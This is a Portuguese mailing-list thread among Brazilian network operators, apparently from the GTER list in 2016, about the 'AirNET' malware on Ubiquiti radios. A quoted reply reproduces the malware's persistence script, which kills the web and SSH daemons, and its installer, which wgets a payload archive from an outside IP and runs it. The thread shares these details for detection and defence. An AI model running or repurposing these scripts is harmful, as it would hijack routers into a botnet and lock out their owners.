[GTER] RES: Vírus ubnt

Márcio Elias Hahn do Nascimento marcio at sulonline.net
Thu Oct 13 10:51:07 -03 2016


 

Obrigado pelas informações Alexandre. 

Realmente não tive nenhum
equipamento com esse problema. 

Versões entre 4x (equipamentos beem
antigos antes da linha MiMo, poucos, mais tem...) e todos os tipos de
5.x (embora a grande maioria seja 5.6.6). 

Detalhe. 

Todas as portas
entre 0-1024 estão fechadas para o mundo e abertas apenas para uma rede
de gerência. 

---

Att 

Márcio Elias Hahn do Nascimento
(48) 8469-1819
/ 3524-0700 - marcio at sulonline.net
INOC-BR: 52977*100
GERÊNCIA DE
RECURSOS DE TIC - Sul Internet [5] 

 [5] 

Em 13/10/2016 10:21,
Alexandre J. Correa (Onda) escreveu: 

> no /etc/persistent/ deve conter
alguns arquivos, por exemplo o rc.poststart
> 
> que contem:
> 
>
owned() {
> sleep 10
> kill -HUP 1 1>/dev/null 2>/dev/null
> kill -9
`pidof lighttpd dropbear` 1>/dev/null 2>/dev/null
> }
> 
>
/var/etc/persistent/AirNET init
> ( owned ) &
> 
> há um arquivo chamado
porra.sh também, que é por onde ele baixa o 'kit' 
> e executa a
instalação:
> 
> #!/bin/sh
> 
> rm -rf /tmp/AirNET*
> wget -q
http://5.196.50.44/mips/AirNET.tgz [4]-O /tmp/AirNET.tgz
> if [ -f
"/tmp/AirNET.tgz" ]; then
> mkdir -p /tmp/AirNET
> tar xzf
/tmp/AirNET.tgz -C /tmp/AirNET
> rm -rf /tmp/AirNET.tgz
> cd
/tmp/AirNET
> sh install.sh
> else
> echo "error: wget"
> fi
> rm -rf
/tmp/AirNET*
> 
> Esta variante o desenvolvedor foi mais inteligente,
ele compilou o 
> daemon, dificultando a identificação do que ele faz...
consegui 
> decodificar e ele entra em uma rede de IRC e provavelmente
recebe 
> comandos pelo IRC mesmo. Imagino que o cara deva ter uma
botnet grande !!!
> 
> Em 13/10/2016 09:56, Márcio Elias Hahn do
Nascimento escreveu:
> 
>> Pessoal, a discussão está muito dispersa e
com muitas informações desencontradas. Qual a assinatura desse vírus?
(como eu digo que um equipamento está ou não infectado? Arquivos
alterados/criados, perda de acesso, alteração de portas, etc). O ideal
seria um posicionamento definitivo sobre isso. Outra, sobre a versão
segura ou não, é utopia, segurança da informação não existe a nível de
100%, então chego a 2 conclusões. 1 - Não vou sair atualizando milhares
de equipamentos. 2 - Vou tratar de fechar a porta para não entrar quem
não deve. --- Att Márcio Elias Hahn do Nascimento (48) 8469-1819 /
3524-0700 - marcio at sulonline.netINOC-BR: 52977*100 GERÊNCIA DE RECURSOS
DE TIC - Sul Internet [3] [3] Em 13/10/2016 08:43, Adriano B. Lima
escreveu: 
>> 
>>>> Há um novo virus, chamado AirNET, ele consegue
capturar as senhas
>> digitadas.. e utliza além da senhas padrões, as
senhas capturadas para acesso aos radios.. ele bloqueia ssh e web...
somente reset para remover... Fwd: a 
>> 
>>> Alexandre, resetando o
equipamento limpa este
>> vírus ou é preciso algum procedimento de
remoção? Outra pergunta, as versões 5.6.9 também estão
alexandre at onda.net.br> escreveu:
https://eng.registro.br/mailman/listinfo/gter[1] -- gter list
http://www.sulinternet.net [3] -- gter list
https://eng.registro.br/mailman/listinfo/gter [2]
>> 
>>> 
> 
> -- 
>
Fwd: a
> 
> *Alexandre Jeronimo Correa* / CEO
> _alexandre at onda.net.br
<mailto:alexandre at onda.net.br>_ / Office +55 34 
> 3351 - 3077
> 
>
*ONDA INTERNET*
> +55 34 3351-3077
> Av. Benedito Valadares, 217 -
Centro - Sacramento - MG - BR
> _http://www.onda.net.br
<http://www.onda.net.br/ [1]>_
> 
> --
> gter list
https://eng.registro.br/mailman/listinfo/gter [2]
 

Links:
------
[1]
http://www.onda.net.br/
[2]
https://eng.registro.br/mailman/listinfo/gter
[3]
https://eng.registro.br/mailman/listinfo/g<div>

> ng.registro.br/mailman/listinfo/gter">https://eng.registro.br/mailman/listinfo/gter [2http://ww
</div>/</a>[3]<ahref=
[4]
http://5.196.50.44/mips/AirNET.tgz
[5] http://www.sulinternet.net



More information about the gter mailing list